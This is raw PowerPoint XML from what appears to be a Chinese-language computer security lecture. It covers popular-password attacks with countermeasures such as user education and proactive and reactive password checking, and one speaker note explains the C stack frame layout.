          <a:ext cx="3571428" cy="2142857"/>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altLang="en-US" sz="1700" b="1" kern="1200"/>
            <a:t>常用口令攻击</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="1" kern="1200"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="755650" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="1" kern="1200"/>
            <a:t>Popular password attack</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200"/>
            <a:t>攻击是使用流行的密码，并针对广泛的用户</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1300" kern="1200"/>
            <a:t>ID</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200"/>
            <a:t>进行尝试</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200"/>
            <a:t>对策包括禁止用户选择常用密码并扫描验证请求的</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1300" kern="1200"/>
            <a:t>IP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200"/>
            <a:t>地址以及提交模式的客户端</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1300" kern="1200"/>
            <a:t>cookie</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200"/>
            <a:t>的策略</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4521971" y="2502671"/>
        <a:ext cx="3571428" cy="21428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D0191-5540-ED4D-ABDA-721F7AE06A53}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="635000" y="0"/>
          <a:ext cx="4825999" cy="4825999"/>
        </a:xfrm>
        <a:prstGeom prst="diamond">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx2"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="bg2"/>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78895B2-0777-2945-8876-3C597FC17514}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1062602" y="460653"/>
          <a:ext cx="1882140" cy="18821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1" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>用户教育</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>用户可以被告知使用难以猜测的密码的重要性，并且可以提供选择强密码的准则</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1154481" y="552532"/>
        <a:ext cx="1698382" cy="1698382"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3FF97A81-660B-AD4E-A63C-9EB9B74360E9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3120390" y="458470"/>
          <a:ext cx="1882140" cy="18821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zh-CN" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>计算机生成的密码</a:t>
          </a:r>
          <a:endParaRPr lang="en-AU" sz="1400" b="1" i="0" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>计算机生成的密码方案具有用户接受程度差的历史</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>用户难以记住它们</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3212269" y="550349"/>
        <a:ext cx="1698382" cy="1698382"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3FACEB1C-056B-7441-B599-2420B75997CE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1093470" y="2485390"/>
          <a:ext cx="1882140" cy="18821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b="1" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Reactive password checking</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>后验口令检验</a:t>
          </a:r>
          <a:endParaRPr lang="en-AU" sz="1400" b="1" i="0" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>系统定期运行自己的密码破解程序以查找可猜测密码的策略</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1185349" y="2577269"/>
        <a:ext cx="1698382" cy="1698382"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D8752D80-F3DA-9F40-AB2E-CBA1FC4747F0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3120390" y="2485390"/>
          <a:ext cx="1882140" cy="18821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AU" sz="1400" b="1" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Proactive password checking</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>先验口令检验</a:t>
          </a:r>
          <a:endParaRPr lang="en-AU" sz="1400" b="1" i="0" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>允许用户选择自己的密码，但是在选择时，系统会检查密码是否可以允许，否则拒绝</a:t>
          </a:r>
          <a:endParaRPr lang="en-AU" sz="1400" b="1" i="0" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3212269" y="2577269"/>
        <a:ext cx="1698382" cy="1698382"/>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B0236600-A461-471C-9BAB-3185586DE122}"/>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Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91139" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BE05166-458F-4957-8086-790FE854C312}"/>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Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4100" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBC13233-08B7-41CB-AA46-0553C98B8E8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1" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A1AF1D9-C9A1-46D7-82F3-37040D6BBC72}"/>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1142" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{204FC57A-6A84-49EF-982B-125FE8373B0E}"/>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Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91143" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE15834D-5855-42DB-B0CC-02CC00EB37F5}"/>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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A478A249-2F7B-488A-B404-34E60343A07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4F119CB-30C3-4A20-823D-EE735BA902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2540A30-9B4D-4B1D-AC32-45722273B67E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{772B2C22-F0C1-46AF-8448-2BF99F13F967}"/>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25F34B9A-E7C0-4A6A-BE84-0347D7CD70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tx1"/>
              </a:buClr>
            </a:pPr>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425E638B-624C-4C22-9354-19F7B6D5D819}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83C33920-EFE5-401C-B136-0233C19141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C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语言函数从右向左入栈，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是参数，返回地址是函数名指向的地址，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>保存的是调用函数的栈帧底部地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25604" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84D4D18C-FC9B-434B-ADC2-B487A53685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16570C5-47BD-49B2-A501-370D04DC188E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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CF280BFB-A637-44F6-B049-9DFA0D379CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7C91B2E-0350-48B8-AA9F-E1AF9246E9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8" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB8CC224-1863-4D41-9C4B-689019BDCC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2F36867-1336-446A-A7D8-66AE618C97F6}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="12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4969C83B-01BE-4D03-93D7-C0F4D4939E6E}"/>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DB14A6FB-0554-4626-8A5E-01421185C7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796" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE0CDC17-179D-4436-8447-00859F3F83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A541B8D-0FF6-4EBA-BB47-99B9458415FF}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{339BAEE5-4F9F-44C5-A02B-9B89999B54DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A3EC893-A3D3-4BF1-AF5D-40CA62BFB4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灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1022FE5C-350E-4C7E-95EC-75335DB7A08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517B511-58A7-4CF9-A3B4-91283B7A6431}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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AB6D4A62-B1E7-4110-AED8-E41126C3CE34}"/>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324F5C5B-40DF-4182-96E7-60A5C44AA4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2" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{072C179E-22AD-454C-87A2-7CD619443DA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8341E82-4889-48B5-9AC5-C5A07736CE7F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="12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6DE58F56-39E0-4984-BBBE-E852BB0E81F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52EC4B4F-6F66-48C4-9141-6FBB3A362E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0" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72710093-41D8-4921-9D7E-CD1F02A633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9FBD843-A5BA-4385-8D30-15DFDBF8CFE2}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C877EDF-108C-46E3-80A9-6F694F809DD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9977D420-BE26-4930-BC5E-226C469DC2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88" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{828F4E4E-E6B2-4825-BF5A-FF54C74FD8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0521ED9-2A04-49F0-8271-89C9A06EF22B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F79169D5-A872-4636-A4FF-CDB8C6E5E200}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B87ACEBA-8D65-4CF9-88F4-3BE52D39E15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4036" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B08BA988-FA5D-4D01-9CE8-3BA1086B99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81C656D-0ED7-4FD6-91AA-9811387067D6}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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2DF446F7-9CEF-49B2-945A-66CC290B2C8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46083" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2021453-FE50-45FF-AF62-E29A78125B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6084" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D164C4F-216B-41CB-9F61-C0B3DC7CBB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8694DE65-8ED3-47F3-9B41-42CFBB303407}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{931988B6-638A-4CE1-8863-DE3088962A17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
